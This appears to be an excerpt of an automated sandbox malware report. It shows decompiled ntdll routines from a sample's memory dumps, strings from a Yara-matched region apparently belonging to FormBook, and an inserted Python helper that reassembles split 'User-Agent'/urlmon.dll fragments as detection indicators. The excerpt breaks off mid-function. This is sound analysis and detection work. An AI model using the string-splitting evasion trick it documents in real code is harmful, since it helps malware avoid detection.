                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                              • API String ID: 0-108210295
                                              • Opcode ID: 79f56eec9a1813901ac2cf2a04bfd27f4679f00ed21ed3c9b9628197a5900f2a
                                              • Instruction ID: 187ecbf06cdf2c6e3e739cf9e7891a9f02aaff3ed9e9abb190d71089d007591d
                                              • Opcode Fuzzy Hash: 79f56eec9a1813901ac2cf2a04bfd27f4679f00ed21ed3c9b9628197a5900f2a
                                              • Instruction Fuzzy Hash: A3812531B41300FFEF21AA4EAC86D6B3B39EFA6B52F014048F50D9B252D2698601D772
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 44%
                                              			E019A1C06() {
                                              				signed int _t27;
                                              				char* _t104;
                                              				char* _t105;
                                              				intOrPtr _t113;
                                              				intOrPtr _t115;
                                              				intOrPtr _t117;
                                              				intOrPtr _t119;
                                              				intOrPtr _t120;
                                              
                                              				_t105 = 0x18c48a4;
                                              				_t104 = "HEAP: ";
                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              					_push(_t104);
                                              					E018EB150();
                                              				} else {
                                              					E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              				}
                                              				_push( *0x19d589c);
                                              				E018EB150("Heap error detected at %p (heap handle %p)\n",  *0x19d58a0);
                                              				_t27 =  *0x19d5898; // 0x0
                                              				if(_t27 <= 0xf) {
                                              					switch( *((intOrPtr*)(_t27 * 4 +  &M019A1E96))) {
                                              						case 0:
                                              							_t105 = "heap_failure_internal";
                                              							goto L21;
                                              						case 1:
                                              							goto L21;
                                              						case 2:
                                              							goto L21;
                                              						case 3:
                                              							goto L21;
                                              						case 4:
                                              							goto L21;
                                              						case 5:
                                              							goto L21;
                                              						case 6:
                                              							goto L21;
                                              						case 7:
                                              							goto L21;
                                              						case 8:
                                              							goto L21;
                                              						case 9:
                                              							goto L21;
                                              						case 0xa:
                                              							goto L21;
                                              						case 0xb:
                                              							goto L21;
                                              						case 0xc:
                                              							goto L21;
                                              						case 0xd:
                                              							goto L21;
                                              						case 0xe:
                                              							goto L21;
                                              						case 0xf:
                                              							goto L21;
                                              					}
                                              				}
                                              				L21:
                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              					_push(_t104);
                                              					E018EB150();
                                              				} else {
                                              					E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              				}
                                              				_push(_t105);
                                              				E018EB150("Error code: %d - %s\n",  *0x19d5898);
                                              				_t113 =  *0x19d58a4; // 0x0
                                              				if(_t113 != 0) {
                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              						_push(_t104);
                                              						E018EB150();
                                              					} else {
                                              						E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              					}
                                              					E018EB150("Parameter1: %p\n",  *0x19d58a4);
                                              				}
                                              				_t115 =  *0x19d58a8; // 0x0
                                              				if(_t115 != 0) {
                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              						_push(_t104);
                                              						E018EB150();
                                              					} else {
                                              						E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              					}
                                              					E018EB150("Parameter2: %p\n",  *0x19d58a8);
                                              				}
                                              				_t117 =  *0x19d58ac; // 0x0
                                              				if(_t117 != 0) {
                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              						_push(_t104);
                                              						E018EB150();
                                              					} else {
                                              						E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              					}
                                              					E018EB150("Parameter3: %p\n",  *0x19d58ac);
                                              				}
                                              				_t119 =  *0x19d58b0; // 0x0
                                              				if(_t119 != 0) {
                                              					L41:
                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              						_push(_t104);
                                              						E018EB150();
                                              					} else {
                                              						E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              					}
                                              					_push( *0x19d58b4);
                                              					E018EB150("Last known valid blocks: before - %p, after - %p\n",  *0x19d58b0);
                                              				} else {
                                              					_t120 =  *0x19d58b4; // 0x0
                                              					if(_t120 != 0) {
                                              						goto L41;
                                              					}
                                              				}
                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                              					_push(_t104);
                                              					E018EB150();
                                              				} else {
                                              					E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                              				}
                                              				return E018EB150("Stack trace available at %p\n", 0x19d58c0);
                                              			}
                                              0x00000000
                                              0x019a1e08
                                              0x019a1e5b
                                              0x019a1e7a
                                              0x019a1e7b
                                              0x019a1e5d
                                              0x019a1e72
                                              0x019a1e77
                                              0x019a1e95

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                              • API String ID: 0-2897834094
                                              • Opcode ID: 463937bb7d6bb47389da54ac2d48b4ed172b5dd83e8f7e20d12453faec466e24
                                              • Instruction ID: 7fc905fe641b585093c078973334c92c78366a21359bf8fbdd098d4ca127e475
                                              • Opcode Fuzzy Hash: 463937bb7d6bb47389da54ac2d48b4ed172b5dd83e8f7e20d12453faec466e24
                                              • Instruction Fuzzy Hash: A161A432916646DFD211AB49D489D2473F4EB04B71F9A847EF60DDF301D634DA888B8B
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E018F3D34(signed int* __ecx) {
                                              				signed int* _v8;
                                              				char _v12;
                                              				signed int* _v16;
                                              				signed int* _v20;
                                              				char _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				char _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int* _v48;
                                              				signed int* _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				char _v68;
                                              				signed int _t140;
                                              				signed int _t161;
                                              				signed int _t167;
                                              				signed int* _t170;
                                              				signed int* _t174;
                                              				signed int _t191;
                                              				signed int* _t201;
                                              				signed int* _t202;
                                              				signed int _t214;
                                              				signed int* _t224;
                                              				signed int* _t225;
                                              				signed int* _t236;
                                              				signed int* _t242;
                                              				signed int* _t243;
                                              				signed int* _t244;
                                              				signed int* _t245;
                                              				signed int _t255;
                                              				void* _t257;
                                              				signed int _t260;
                                              				void* _t262;
                                              				signed int _t264;
                                              				void* _t267;
                                              				signed int _t275;
                                              				signed int* _t276;
                                              				short* _t277;
                                              				signed int* _t278;
                                              				signed int* _t279;
                                              				signed int* _t280;
                                              				short* _t281;
                                              				signed int* _t282;
                                              				short* _t283;
                                              				signed int* _t284;
                                              				void* _t285;
                                              				/* _t167, _t170, _t174, _t191, _t201, _t202, _t214, _t224 and _t225 are used below
                                              				   but were missing from the decompiler's declaration list; the E*/L* callees are
                                              				   addresses inside the dumped module and are not resolvable outside the dump. */
                                              
                                              				_v60 = _v60 | 0xffffffff;
                                              				_t280 = 0;
                                              				_t242 = __ecx;
                                              				_v52 = __ecx;
                                              				_v8 = 0;
                                              				_v20 = 0;
                                              				_v40 = 0;
                                              				_v28 = 0;
                                              				_v32 = 0;
                                              				_v44 = 0;
                                              				_v56 = 0;
                                              				_t275 = 0;
                                              				_v16 = 0;
                                              				if(__ecx == 0) {
                                              					_t280 = 0xc000000d;
                                              					_t140 = 0;
                                              					L50:
                                              					 *_t242 =  *_t242 | 0x00000800;
                                              					_t242[0x13] = _t140;
                                              					_t242[0x16] = _v40;
                                              					_t242[0x18] = _v28;
                                              					_t242[0x14] = _v32;
                                              					_t242[0x17] = _t275;
                                              					_t242[0x15] = _v44;
                                              					_t242[0x11] = _v56;
                                              					_t242[0x12] = _v60;
                                              					return _t280;
                                              				}
                                              				if(E018F1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                              					_v56 = 1;
                                              					if(_v8 != 0) {
                                              						L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                              					}
                                              					_v8 = _t280;
                                              				}
                                              				if(E018F1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                              					_v60 =  *_v8;
                                              					L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                              					_v8 = _t280;
                                              				}
                                              				if(E018F1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                              					L16:
                                              					if(E018F1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                              						L28:
                                              						if(E018F1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                              							L46:
                                              							_t275 = _v16;
                                              							L47:
                                              							_t161 = 0;
                                              							L48:
                                              							if(_v8 != 0) {
                                              								L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                              							}
                                              							_t140 = _v20;
                                              							if(_t140 != 0) {
                                              								if(_t275 != 0) {
                                              									L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                              									_t275 = 0;
                                              									_v28 = 0;
                                              									_t140 = _v20;
                                              								}
                                              							}
                                              							goto L50;
                                              						}
                                              						_t167 = _v12;
                                              						_t255 = _v12 + 4;
                                              						_v44 = _t255;
                                              						if(_t255 == 0) {
                                              							_t276 = _t280;
                                              							_v32 = _t280;
                                              						} else {
                                              							_t276 = L01904620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                              							_t167 = _v12;
                                              							_v32 = _t276;
                                              						}
                                              						if(_t276 == 0) {
                                              							_v44 = _t280;
                                              							_t280 = 0xc0000017;
                                              							goto L46;
                                              						} else {
                                              							E0192F3E0(_t276, _v8, _t167);
                                              							_v48 = _t276;
                                              							_t277 = E01931370(_t276, 0x18c4e90);
                                              							_pop(_t257);
                                              							if(_t277 == 0) {
                                              								L38:
                                              								_t170 = _v48;
                                              								if( *_v48 != 0) {
                                              									E0192BB40(0,  &_v68, _t170);
                                              									if(L018F43C0( &_v68,  &_v24) != 0) {
                                              										_t280 =  &(_t280[0]);
                                              									}
                                              								}
                                              								if(_t280 == 0) {
                                              									_t280 = 0;
                                              									L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                              									_v44 = 0;
                                              									_v32 = 0;
                                              								} else {
                                              									_t280 = 0;
                                              								}
                                              								_t174 = _v8;
                                              								if(_v8 != 0) {
                                              									L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                              								}
                                              								_v8 = _t280;
                                              								goto L46;
                                              							}
                                              							_t243 = _v48;
                                              							do {
                                              								 *_t277 = 0;
                                              								_t278 = _t277 + 2;
                                              								E0192BB40(_t257,  &_v68, _t243);
                                              								if(L018F43C0( &_v68,  &_v24) != 0) {
                                              									_t280 =  &(_t280[0]);
                                              								}
                                              								_t243 = _t278;
                                              								_t277 = E01931370(_t278, 0x18c4e90);
                                              								_pop(_t257);
                                              							} while (_t277 != 0);
                                              							_v48 = _t243;
                                              							_t242 = _v52;
                                              							goto L38;
                                              						}
                                              					}
                                              					_t191 = _v12;
                                              					_t260 = _v12 + 4;
                                              					_v28 = _t260;
                                              					if(_t260 == 0) {
                                              						_t275 = _t280;
                                              						_v16 = _t280;
                                              					} else {
                                              						_t275 = L01904620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                              						_t191 = _v12;
                                              						_v16 = _t275;
                                              					}
                                              					if(_t275 == 0) {
                                              						_v28 = _t280;
                                              						_t280 = 0xc0000017;
                                              						goto L47;
                                              					} else {
                                              						E0192F3E0(_t275, _v8, _t191);
                                              						_t285 = _t285 + 0xc;
                                              						_v48 = _t275;
                                              						_t279 = _t280;
                                              						_t281 = E01931370(_v16, 0x18c4e90);
                                              						_pop(_t262);
                                              						if(_t281 != 0) {
                                              							_t244 = _v48;
                                              							do {
                                              								 *_t281 = 0;
                                              								_t282 = _t281 + 2;
                                              								E0192BB40(_t262,  &_v68, _t244);
                                              								if(L018F43C0( &_v68,  &_v24) != 0) {
                                              									_t279 =  &(_t279[0]);
                                              								}
                                              								_t244 = _t282;
                                              								_t281 = E01931370(_t282, 0x18c4e90);
                                              								_pop(_t262);
                                              							} while (_t281 != 0);
                                              							_v48 = _t244;
                                              							_t242 = _v52;
                                              						}
                                              						_t201 = _v48;
                                              						_t280 = 0;
                                              						if( *_v48 != 0) {
                                              							E0192BB40(_t262,  &_v68, _t201);
                                              							if(L018F43C0( &_v68,  &_v24) != 0) {
                                              								_t279 =  &(_t279[0]);
                                              							}
                                              						}
                                              						if(_t279 == 0) {
                                              							L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                              							_v28 = _t280;
                                              							_v16 = _t280;
                                              						}
                                              						_t202 = _v8;
                                              						if(_v8 != 0) {
                                              							L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                              						}
                                              						_v8 = _t280;
                                              						goto L28;
                                              					}
                                              				}
                                              				_t214 = _v12;
                                              				_t264 = _v12 + 4;
                                              				_v40 = _t264;
                                              				if(_t264 == 0) {
                                              					_v20 = _t280;
                                              				} else {
                                              					_t236 = L01904620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                              					_t280 = _t236;
                                              					_v20 = _t236;
                                              					_t214 = _v12;
                                              				}
                                              				if(_t280 == 0) {
                                              					_t161 = 0;
                                              					_t280 = 0xc0000017;
                                              					_v40 = 0;
                                              					goto L48;
                                              				} else {
                                              					E0192F3E0(_t280, _v8, _t214);
                                              					_t285 = _t285 + 0xc;
                                              					_v48 = _t280;
                                              					_t283 = E01931370(_t280, 0x18c4e90);
                                              					_pop(_t267);
                                              					if(_t283 != 0) {
                                              						_t245 = _v48;
                                              						do {
                                              							 *_t283 = 0;
                                              							_t284 = _t283 + 2;
                                              							E0192BB40(_t267,  &_v68, _t245);
                                              							if(L018F43C0( &_v68,  &_v24) != 0) {
                                              								_t275 = _t275 + 1;
                                              							}
                                              							_t245 = _t284;
                                              							_t283 = E01931370(_t284, 0x18c4e90);
                                              							_pop(_t267);
                                              						} while (_t283 != 0);
                                              						_v48 = _t245;
                                              						_t242 = _v52;
                                              					}
                                              					_t224 = _v48;
                                              					_t280 = 0;
                                              					if( *_v48 != 0) {
                                              						E0192BB40(_t267,  &_v68, _t224);
                                              						if(L018F43C0( &_v68,  &_v24) != 0) {
                                              							_t275 = _t275 + 1;
                                              						}
                                              					}
                                              					if(_t275 == 0) {
                                              						L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                              						_v40 = _t280;
                                              						_v20 = _t280;
                                              					}
                                              					_t225 = _v8;
                                              					if(_v8 != 0) {
                                              						L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                              					}
                                              					_v8 = _t280;
                                              					goto L16;
                                              				}
                                              			}
                                              0x018f3f39
                                              0x018f3f48
                                              0x018f3f4d
                                              0x018f3f50
                                              0x018f3f50
                                              0x018f3f53
                                              0x018f3f58
                                              0x018f3f65
                                              0x018f3f65
                                              0x018f3f6a
                                              0x00000000
                                              0x018f3f6a
                                              0x018f3edd
                                              0x018f3dda
                                              0x018f3ddd
                                              0x018f3de0
                                              0x018f3de5
                                              0x01948245
                                              0x018f3deb
                                              0x018f3df7
                                              0x018f3dfc
                                              0x018f3dfe
                                              0x018f3e01
                                              0x018f3e01
                                              0x018f3e06
                                              0x0194824d
                                              0x0194824f
                                              0x01948254
                                              0x00000000
                                              0x018f3e0c
                                              0x018f3e11
                                              0x018f3e16
                                              0x018f3e19
                                              0x018f3e29
                                              0x018f3e2c
                                              0x018f3e2f
                                              0x0194825c
                                              0x0194825f
                                              0x01948261
                                              0x01948264
                                              0x0194826c
                                              0x01948280
                                              0x01948282
                                              0x01948282
                                              0x01948289
                                              0x01948290
                                              0x01948293
                                              0x01948294
                                              0x01948298
                                              0x0194829b
                                              0x0194829b
                                              0x018f3e35
                                              0x018f3e38
                                              0x018f3e3d
                                              0x018f3e44
                                              0x018f3e58
                                              0x019482a3
                                              0x019482a3
                                              0x018f3e58
                                              0x018f3e60
                                              0x018f3e6f
                                              0x018f3e74
                                              0x018f3e77
                                              0x018f3e77
                                              0x018f3e7a
                                              0x018f3e7f
                                              0x018f3e8c
                                              0x018f3e8c
                                              0x018f3e91
                                              0x00000000
                                              0x018f3e91

                                              Strings
                                              • Kernel-MUI-Language-Allowed, xrefs: 018F3DC0
                                              • Kernel-MUI-Number-Allowed, xrefs: 018F3D8C
                                              • Kernel-MUI-Language-Disallowed, xrefs: 018F3E97
                                              • Kernel-MUI-Language-SKU, xrefs: 018F3F70
                                              • WindowsExcludedProcs, xrefs: 018F3D6F
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                              • API String ID: 0-258546922
                                              • Opcode ID: c107189b849611e63071afdb5f7ced11b5497bfebe754c6288abcb6939abee79
                                              • Instruction ID: f1e5deaad3a4697e17f8bf5f07f3a0d1d2e6abed068e15dd8f5e295b298b1c52
                                              • Opcode Fuzzy Hash: c107189b849611e63071afdb5f7ced11b5497bfebe754c6288abcb6939abee79
                                              • Instruction Fuzzy Hash: 4BF1F872D00619EBCB15DFD8C980AEEBBB9FF58750F15006AEA05E7251E7359A01CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: Us$: $er-A$gent$urlmon.dll
                                              • API String ID: 0-1367105278
                                              • Opcode ID: f7b25de653cba3c7a340a7be68eb334dd4bd007b059be1358b379c8992364724
                                              • Instruction ID: b90b82e2bcc5e4791cb9ab7027b903a29d4f78733cb77cd6afc1b506c52bbb04
                                              • Opcode Fuzzy Hash: f7b25de653cba3c7a340a7be68eb334dd4bd007b059be1358b379c8992364724
                                              • Instruction Fuzzy Hash: 92416D72D05614AFD7009E65DC42BEFB7B8EF81724F04025FEC4497281D3799A9287DA
                                              Uniqueness

                                              Uniqueness Score: -1.00%
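The String ID field above lists the constants the function in the 0x400000 dump references: "Us", ": ", "er-A", "gent" and "urlmon.dll". Read in order, the four short pieces concatenate to the HTTP header name "User-Agent: ", so the function is presumed to assemble that string at run time rather than keep it as one constant; that reading is an interpretation by the editor, not a finding the report states. The following Python helper, added here and not part of the Joe Sandbox report or the sample, splits a "String ID" field on the report's "$" separator and searches ordered combinations of the fragments for tokens in a small dictionary. The dictionary (KNOWN_TOKENS), the function names and the second, ntdll-derived input are the editor's own; the two input strings are copied from the report's String ID fields.

```python
"""Recover split string constants from a Joe Sandbox-style 'String ID' field.

Added example; not code from the sandbox report or from the analysed sample.
The report joins the distinct constants a function references with '$'.
Several very short constants in one function are treated here as pieces of
a string the code assembles at run time (an assumption, not a report claim).
"""
from itertools import permutations

# Constructed inputs: copied from the report's String ID fields.
STRING_ID_FORMBOOK = "Us$: $er-A$gent$urlmon.dll"
STRING_ID_NTDLL = (
    "Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$"
    "Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs"
)

# Tokens worth recovering. Assumed starter list; extend for the case at hand.
KNOWN_TOKENS = {
    "User-Agent: ",
    "User-Agent",
    "urlmon.dll",
    "wininet.dll",
    "Content-Type: ",
}


def split_string_id(field: str) -> list[str]:
    """Split the '$'-joined String ID field into its constants.

    A constant that itself contains '$' cannot be recovered, because the
    report format does not escape the separator.
    """
    return field.split("$")


def reassemble(fragments: list[str], known=KNOWN_TOKENS,
               max_parts: int = 5) -> dict[str, tuple[str, ...]]:
    """Try ordered combinations of 1..max_parts fragments and return the
    known tokens they concatenate to, mapped to the fragment order used.

    Fragment counts in a String ID field are small, so brute-forcing the
    ordered subsets is cheap (a few hundred candidates for five fragments).
    """
    found: dict[str, tuple[str, ...]] = {}
    for n in range(1, min(max_parts, len(fragments)) + 1):
        for combo in permutations(fragments, n):
            joined = "".join(combo)
            if joined in known and joined not in found:
                found[joined] = combo
    return found


def split_string_indicators(field: str) -> list[str]:
    """Tokens reachable only by joining two or more fragments.

    A single-fragment hit is an ordinary string constant; only a token that
    had to be stitched together from pieces is treated as an indicator of
    run-time string assembly.
    """
    hits = reassemble(split_string_id(field))
    return sorted(tok for tok, parts in hits.items() if len(parts) > 1)


if __name__ == "__main__":
    for label, field in (("0x400000 dump", STRING_ID_FORMBOOK),
                         ("ntdll dump", STRING_ID_NTDLL)):
        print(label, split_string_indicators(field))
```

The ntdll-derived field is included as a negative control: its constants are complete identifiers, so no token is assembled from more than one fragment and the helper reports nothing for it. When extending KNOWN_TOKENS, keep the dictionary to strings that are rarely split by compilers (header names, DLL and API names); otherwise the permutation search produces hits from coincidental substrings.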

                                              C-Code - Quality: 44%
                                              			E01918E00(void* __ecx) {
                                              				signed int _v8;
                                              				char _v12;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				intOrPtr* _t32;
                                              				intOrPtr _t35;
                                              				intOrPtr _t43;
                                              				void* _t46;
                                              				intOrPtr _t47;
                                              				void* _t48;
                                              				signed int _t49;
                                              				void* _t50;
                                              				intOrPtr* _t51;
                                              				signed int _t52;
                                              				void* _t53;
                                              				intOrPtr _t55;
                                              
                                              				_v8 =  *0x19dd360 ^ _t52;
                                              				_t49 = 0;
                                              				_t48 = __ecx;
                                              				_t55 =  *0x19d8464; // 0x74e10110
                                              				if(_t55 == 0) {
                                              					L9:
                                              					if( !_t49 >= 0) {
                                              						if(( *0x19d5780 & 0x00000003) != 0) {
                                              							E01965510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                              						}
                                              						if(( *0x19d5780 & 0x00000010) != 0) {
                                              							asm("int3");
                                              						}
                                              					}
                                              					return E0192B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                              				}
                                              				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                              				_t43 =  *0x19d7984; // 0x1482b18
                                              				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                              					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                              					if(_t48 == _t43) {
                                              						_t50 = 0x5c;
                                              						if( *_t32 == _t50) {
                                              							_t46 = 0x3f;
                                              							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                              								_t32 = _t32 + 8;
                                              							}
                                              						}
                                              					}
                                              					_t51 =  *0x19d8464; // 0x74e10110
                                              					 *0x19db1e0(_t47, _t32,  &_v12);
                                              					_t49 =  *_t51();
                                              					if(_t49 >= 0) {
                                              						L8:
                                              						_t35 = _v12;
                                              						if(_t35 != 0) {
                                              							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                              								E01919B10( *((intOrPtr*)(_t48 + 0x48)));
                                              								_t35 = _v12;
                                              							}
                                              							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                              						}
                                              						goto L9;
                                              					}
                                              					if(_t49 != 0xc000008a) {
                                              						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                              							if(_t49 != 0xc00000bb) {
                                              								goto L8;
                                              							}
                                              						}
                                              					}
                                              					if(( *0x19d5780 & 0x00000005) != 0) {
                                              						_push(_t49);
                                              						E01965510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                              						_t53 = _t53 + 0x1c;
                                              					}
                                              					_t49 = 0;
                                              					goto L8;
                                              				} else {
                                              					goto L9;
                                              				}
                                              			}


                                              Strings
                                              • LdrpFindDllActivationContext, xrefs: 01959331, 0195935D
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 0195933B, 01959367
                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0195932A
                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 01959357
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 0-3779518884
                                              • Opcode ID: 9f87bb8c14dc25a759baec0779c6b2896feb6753bff3170cb61769c2429fa587
                                              • Instruction ID: e035cdfff0b1530630469dbe942d5c09d0c29152b523c2ad295485a4630fc761
                                              • Opcode Fuzzy Hash: 9f87bb8c14dc25a759baec0779c6b2896feb6753bff3170cb61769c2429fa587
                                              • Instruction Fuzzy Hash: 8E412B31A0031DDEEF36BA1C888DE75BAB8AB0174AF06452DE90C9755AE770BDC093C1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 83%
                                              			E018F8794(void* __ecx) {
                                              				signed int _v0;
                                              				char _v8;
                                              				signed int _v12;
                                              				void* _v16;
                                              				signed int _v20;
                                              				intOrPtr _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v40;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				intOrPtr* _t77;
                                              				signed int _t80;
                                              				signed char _t81;
                                              				signed int _t87;
                                              				signed int _t91;
                                              				void* _t92;
                                              				void* _t94;
                                              				signed int _t95;
                                              				signed int _t103;
                                              				signed int _t105;
                                              				signed int _t110;
                                              				signed int _t118;
                                              				intOrPtr* _t121;
                                              				intOrPtr _t122;
                                              				signed int _t125;
                                              				signed int _t129;
                                              				signed int _t131;
                                              				signed int _t134;
                                              				signed int _t136;
                                              				signed int _t143;
                                              				signed int* _t147;
                                              				signed int _t151;
                                              				void* _t153;
                                              				signed int* _t157;
                                              				signed int _t159;
                                              				signed int _t161;
                                              				signed int _t166;
                                              				signed int _t168;
                                              
                                              				_push(__ecx);
                                              				_t153 = __ecx;
                                              				_t159 = 0;
                                              				_t121 = __ecx + 0x3c;
                                              				if( *_t121 == 0) {
                                              					L2:
                                              					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                              					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                              						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                              						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                              						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                              							L6:
                                              							if(E018F934A() != 0) {
